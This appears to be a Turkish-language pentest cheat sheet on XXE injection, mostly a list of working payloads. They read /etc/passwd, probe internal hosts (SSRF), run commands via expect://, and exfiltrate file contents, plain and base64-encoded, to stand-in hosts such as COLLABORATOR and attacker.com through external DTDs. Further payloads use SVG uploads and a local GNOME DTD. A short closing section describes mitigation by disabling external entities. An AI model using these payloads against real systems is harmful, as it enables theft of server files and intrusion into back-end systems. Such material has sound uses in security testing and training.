XML external entity injection, bir saldırganın bir uygulamanın XML verilerini işlemesine müdahale etmesine imkan tanıyan bir web güvenlik açığıdır.
Genellikle bir saldırganın uygulama sunucusu dosya sistemindeki dosyaları görüntülemesine ve uygulamanın kendisinin erişebildiği herhangi bir back-end veya external sistemle etkileşime girmesine izin verir.
Bazı durumlarda saldırgan, SSRF saldırıları gerçekleştirmek için XXE güvenlik açığından yararlanarak sunucuyu veya back-end sistemleri ele geçirmek için bir XXE saldırısını kullanabilir.
Yöntemler
Basic XXE
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
XXE SSRF
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://127.0.0.1/"> ]>
XXE RCE
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "expect://whoami"> ]>
Blind XXE
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://COLLABORATOR"> ]>
&xxe;
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE test [<!ENTITY % xxe SYSTEM "http://COLLABORATOR"> %xxe; ]>
Blind XXE ile Veri Çekme
<!--Exploit Server-->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://COLLABORATOR/?x=%file;'>">
%eval;
%exfil;
<!--Target-->
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/exploit.dtd"> %xxe;]>
BASE64 Blind XXE ile Veri Çekme
<!--Exploit Server-->
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://COLLABORATOR/?x=%file;'>">
%eval;
%exfil;
<!--Target-->
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/exploit.dtd"> %xxe;]>
Blind XXE Error Message
<!--Exploit Server-->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
<!--Target-->
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/exploit.dtd"> %xxe;]>
XInclude XXE
Eğer xml'in tamamını kontrol edemiyorsak sadece parametrelerini kontrol edebiliyorsak denenir.
Eğer bir dosya yükleme fonksiyonu svg dosyası kabul ediyorsa çalışabilir.
Apache Batik kütüphanesi kullanılıyorsa çalışır.
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
Local DTD ile XXE
Sadece GNOME ortamlarda çalışır.
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
'>
%local_dtd;
]>
Çözümler
Neredeyse tüm XXE güvenlik açıkları, uygulamanın XML parser kütüphanesinin, uygulamanın ihtiyaç duymadığı veya kullanmayı düşünmediği potansiyel olarak tehlikeli XML özelliklerini desteklemesi nedeniyle ortaya çıkar. XXE saldırılarını önlemenin en kolay ve etkili yolu bu özellikleri devre dışı bırakmaktır.
Genellikle, harici varlıkların çözümlemesini devre dışı bırakmak ve XInclude desteğini devre dışı bırakmak yeterlidir. Bu genellikle yapılandırma seçenekleri aracılığıyla veya varsayılan davranışı programlı olarak geçersiz kılarak yapılabilir.
